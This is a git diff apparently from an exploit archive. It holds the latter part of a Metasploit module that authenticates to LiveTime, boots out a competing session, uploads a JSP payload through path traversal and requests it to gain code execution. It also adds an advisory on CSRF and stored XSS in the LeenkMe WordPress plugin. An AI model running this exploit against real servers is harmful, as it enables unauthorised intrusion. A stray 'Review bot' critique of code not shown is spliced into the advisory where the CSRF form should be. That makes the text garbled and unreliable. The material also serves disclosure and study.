6.1; Trident/6.0)', + } + }) + + if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/ + login_url = $2 + @cookies = res.get_cookies + if res.body.to_s =~ /type\=\"password\" name\=\"([\w\.]+)\" \/\>/ + password_form = $1 + else + # we shouldn't hit this condition at all, this is default for v7+ + password_form = 'password' + end + if res.body.to_s =~ /type\=\"text\" name\=\"([\w\.]+)\" \/\>/ + username_form = $1 + else + # we shouldn't hit this condition at all, this is default for v7+ + username_form = 'username' + end + else + fail_with(Failure::NoAccess, "#{peer} - Failed to get the login URL.") + end + + # 2: authenticate and get the import_url + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(login_url), + 'headers' => { + 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', + }, + 'cookie' => @cookies, + 'vars_post' => { + username_form => datastore['USERNAME'], + password_form => datastore['PASSWORD'], + 'ButtonLogin' => 'Login' + } + }) + + if res && res.code == 200 && + (res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above + res.body.to_s =~ /\

/) # v6.5 + import_url = $1 + else + # hmm either the password is wrong or someone else is using "our" account.. . + # let's try to boot him out + if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/ && + res.body.to_s =~ /This account is in use on another system/ + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(login_url), + 'headers' => { + 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', + }, + 'cookie' => @cookies, + 'vars_post' => { + username_form => datastore['USERNAME'], + password_form => datastore['PASSWORD'], + 'ButtonLoginOverride' => 'Login' + } + }) + if res && res.code == 200 && + (res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above + res.body.to_s =~ /\/) # v6.5 + import_url = $1 + else + fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.") + end + else + fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.") + end + end + + # 3: get the upload_url + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(import_url), + 'headers' => { + 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', + }, + 'cookie' => @cookies, + 'vars_post' => { + 'ButtonImport' => 'Import' + } + }) + + if res && res.code == 200 && + (res.body.to_s =~ /id\=\"clientImportUploadForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above + res.body.to_s =~ /\/) # v6.5 + @upload_url = $1 + else + fail_with(Failure::Unknown, "#{peer} - Failed to get the upload URL.") + end + + if res.body.to_s =~ /\/ + @upload_form = $1 + else + # go with the default for 7.1.0, might not work with other versions... + @upload_form = "0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23" + end + + # 4: target selection + @my_target = nil + # pick_target returns the traversal_path and sets @my_target + traversal_path = pick_target + if @my_target.nil? 
+ fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.") + else + print_status("#{peer} - Selected target #{@my_target.name} with traversal path #{traversal_path}") + end + + # When using auto targeting, MSF selects the Windows meterpreter as the default payload. + # Fail if this is the case and ask the user to select an appropriate payload. + if @my_target['Platform'] == 'linux' && payload_instance.name =~ /Windows/ + fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.") + end + + # 5: generate the JSP with the payload + jsp = create_jsp + print_status("#{peer} - Uploading payload...") + jsp_name = upload_jsp(traversal_path, jsp) + if traversal_path.include? '/srv/tomcat6/webapps/' + register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name) + else + register_files_for_cleanup('../webapps/LiveTime/' + jsp_name) + end + + # 6: pwn it! + print_status("#{peer} - Requesting #{jsp_name}") + send_request_raw({'uri' => normalize_uri('LiveTime', jsp_name)}) + + handler + end +end \ No newline at end of file diff --git a/platforms/php/webapps/39704.txt b/platforms/php/webapps/39704.txt new file mode 100755 index 000000000..4734c5b31 --- /dev/null +++ b/platforms/php/webapps/39704.txt @@ -0,0 +1,117 @@ +I would like to disclose CSRF and stored XSS vulnerability in Wordpress +plugin LeenkMe version 2.5.0. + +The plugin can be found at https://wordpress.org/plugins/leenkme/ + +In the page wp-content/plugins/leenkme/facebook.php + +XSS vulnerable Fields are : + + - facebook_message + - facebook_linkname + - facebook_caption + - facebook_description + - default_image + - _wp_http_referer + + +This CSRF is tested on latest wordpress installation 4.4.2 using firefox +browser. + +The Code for CSRF.html is + + + + + + + + + + + + + + + + + +
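Review bot: In `upload_jsp`, the guard `if not res && res.code == 200` parses as `(not res) && (res.code == 200)`: a nil response raises NoMethodError on `res.code`, and any non-nil response skips `fail_with`, so a rejected upload is reported as success and the module goes on to request a JSP that was never written; it should read `unless res && res.code == 200`. The `check` method has a related flaw: `get_version` returns `999` when the version page cannot be fetched or matched, and `check` maps `version > 7.1` to `Exploit::CheckCode::Safe`, so an unreachable host or an unrelated web server is reported as Safe instead of Unknown — returning `nil` from `get_version` and testing `return Exploit::CheckCode::Unknown if version.nil?` first in `check` would fix that. Minor: the `payload = exploit_regenerate_payload(...)` assignment in `create_jsp` is unused, since `generate_payload_exe(opts)` is what produces the executable.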
+ + + + +The vulnerable page is + +wp-content/plugins/leenkme/facebook.php + +The vulnerable code producing XSS is + + +if ( !empty( $_REQUEST['facebook_message'] ) ) +$user_settings['facebook_message'] = $_REQUEST['facebook_message']; +else +$user_settings['facebook_message'] = ''; +if ( !empty( $_REQUEST['facebook_linkname'] ) ) +$user_settings['facebook_linkname'] = $_REQUEST['facebook_linkname']; +else +$user_settings['facebook_linkname'] = ''; +if ( !empty( $_REQUEST['facebook_caption'] ) ) +$user_settings['facebook_caption'] = $_REQUEST['facebook_caption']; +else +$user_settings['facebook_caption'] = ''; +if ( !empty( $_REQUEST['facebook_description'] ) ) +$user_settings['facebook_description'] = $_REQUEST['facebook_description']; + + +------------------------- +------------------------- +------------------------- +snip +------------------------ +------------------------- +-------------------------- + +